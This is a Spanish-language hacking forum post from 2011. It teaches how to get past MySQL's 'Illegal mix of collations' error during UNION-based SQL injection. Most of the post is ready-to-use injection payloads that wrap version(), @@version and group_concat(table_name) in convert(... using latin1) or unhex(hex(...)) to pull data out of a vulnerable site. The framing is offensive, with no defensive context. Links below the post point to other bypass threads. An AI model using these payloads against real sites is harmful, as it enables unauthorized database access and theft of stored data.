comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bypassear "Illegal mix of collations"

  • 0 Respuestas
  • 1320 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« en: Agosto 25, 2011, 12:16:05 am »
Bueno supongamos que tenemos una inyeccion comun y ya sacamos las columnas vulnerables, ahi es cuando tratamos de encontrar la version y hacemos


No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,version(),4,5,6,7--

o sino

No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,@@version,4,5,6,7--

Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR

Hay varias maneras de bypassear esto, algunas son:

Convert("comando" using latin1)

unhex(hex("comando"))

Ejemplos:

No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--

No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--

No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--

LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:

No tienes permisos para ver links. Registrate o Entra con tu cuenta UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--

Espero que les haya gustado!

 

¿Te gustó el post? COMPARTILO!



Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 3116
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster
Bypassear uploader con validacion en JavaScript

Iniciado por Xt3mP

Respuestas: 2
Vistas: 2411
Último mensaje Agosto 30, 2012, 01:31:40 pm
por hdbreaker
Bypassear FuckingScan[Mozilla Firefox]

Iniciado por Matabarras

Respuestas: 1
Vistas: 1612
Último mensaje Abril 16, 2014, 07:07:42 am
por meteor0
Otra forma de bypassear un uploader

Iniciado por Xt3mP

Respuestas: 0
Vistas: 2535
Último mensaje Abril 20, 2012, 02:42:01 am
por Xt3mP
Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1540
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy